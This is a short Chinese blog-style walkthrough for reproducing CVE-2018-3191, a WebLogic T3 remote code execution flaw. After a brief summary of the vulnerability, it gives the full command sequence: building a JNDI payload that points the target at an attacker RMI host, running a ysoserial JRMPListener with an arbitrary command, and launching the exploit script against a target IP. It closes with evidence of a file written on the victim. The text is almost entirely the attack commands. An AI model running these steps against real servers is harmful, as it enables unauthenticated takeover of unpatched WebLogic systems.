CVE-2018-3191远程代码命令执行漏洞

0x00 weblogic漏洞简介

北京时间10月17日,Oracle官方发布的10月关键补丁更新CPU(Critical Patch Update)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-3191)。该漏洞允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致WebLogic Server被攻击者接管,从而造成远程代码执行。这个漏洞由Matthias Kaiser,loopx9,Li Zhengdong申报。

0x01复现准备

首先准备payload

java -jar weblogic-spring-jndi.jar rmi://攻击端ip:端口/Exp > payload.txt

然后搭建rmi服务器端

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 端口 CommonsCollections1 "要执行的指令"

0x02 复现

Python weblogic.py target_ip target_port payload.txt

CVE-2018-3191远程代码命令执行漏洞_第1张图片

此时rmi服务器那边能看到有连接

CVE-2018-3191远程代码命令执行漏洞_第2张图片

0x03 验证结果

此时可以看到1.txt写入了

CVE-2018-3191远程代码命令执行漏洞_第3张图片

你可能感兴趣的:(CVE-2018-3191远程代码命令执行漏洞)